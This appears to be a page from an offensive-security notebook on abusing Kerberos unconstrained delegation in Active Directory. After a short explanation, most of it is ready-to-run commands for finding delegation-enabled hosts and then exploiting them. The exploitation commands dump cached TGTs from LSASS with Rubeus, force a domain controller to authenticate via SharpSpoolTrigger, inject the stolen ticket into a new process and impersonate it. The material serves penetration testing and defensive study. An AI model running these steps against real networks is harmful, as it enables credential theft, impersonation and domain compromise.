Unconstrained Delegation

Unconstrained Delegation is a feature in the Kerberos authentication protocol that allows a service to request a Service Ticket for ANY service on behalf of a user.

The Trust this computer for delegation to any service (Kerberos only) privilege must be enabled in the Delegation tab within the object/computer's properties.

When delegation is enabled on a computer, the Key Distribution Center will include a copy of the user's Ticket Granting Ticket inside the Service Ticket. When a user authenticates to the target service using the Service Ticket, their Ticket Granting Ticket will be cached in memory on the computer hosting the service for future delegation use.

The goal is to identify and gain access to machines allowing unconstrained delegation in order to extract cached Ticket Granting Tickets that can be used to request a Service Ticket for any other service on behalf of the user.

Enumeration

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux (Attacker)

findDelegation.py [domain]/[username]:[password]

Get-ADComputer (ActiveDirectory)MicrosoftLearn

Windows (PowerShell)

Get-ADComputer "Account" -Properties TrustedForDelegation,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount

GitHub - tomcarver16/ADSearch: A tool to help query AD via the LDAP protocolGitHub

Windows (Target)

ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

Exploit

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

GitHub - S3cur3Th1sSh1t/SharpImpersonation: A User Impersonation tool - via Token or Shellcode injectionGitHub

Windows (Target)

## Show Cached Tickets
Rubeus.exe triage

## Extract The TGT Using Its LUID (/nowrap To Make It Copy Friendly)
Rubeus.exe dump /luid:0x14794e /nowrap

## Create A Process And Inject The Dumped TGT
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:AnyPassword /ticket:[tgt]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"

You must have elevated privileges on the target computer in order to dump TGTs from LSASS.

GitHub - cube0x0/SharpSystemTriggers: Collection of remote authentication triggers in C#GitHub

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

GitHub - S3cur3Th1sSh1t/SharpImpersonation: A User Impersonation tool - via Token or Shellcode injectionGitHub

Windows (Target)

## Monitor And Extract New TGTs As They Get Cached In The Local Computer
Rubeus.exe monitor /interval:10 /nowrap /runfor:60

## Force Authentication From Target (dc) To Listener (service)
SharpSpoolTrigger.exe dc.weelee.zip service.weelee.zip

## Create A Process And Inject The Dumped TGT
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:AnyPassword /ticket:[tgt]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"

You must have elevated privileges on the listener (in this case service.weelee.zip) in order to monitor for new cached Kerberos Tickets on it.

PreviousKerberos Delegation NextConstrained Delegation

Last updated 1 year ago

hashtagEnumeration

hashtagExploit

Enumeration

Exploit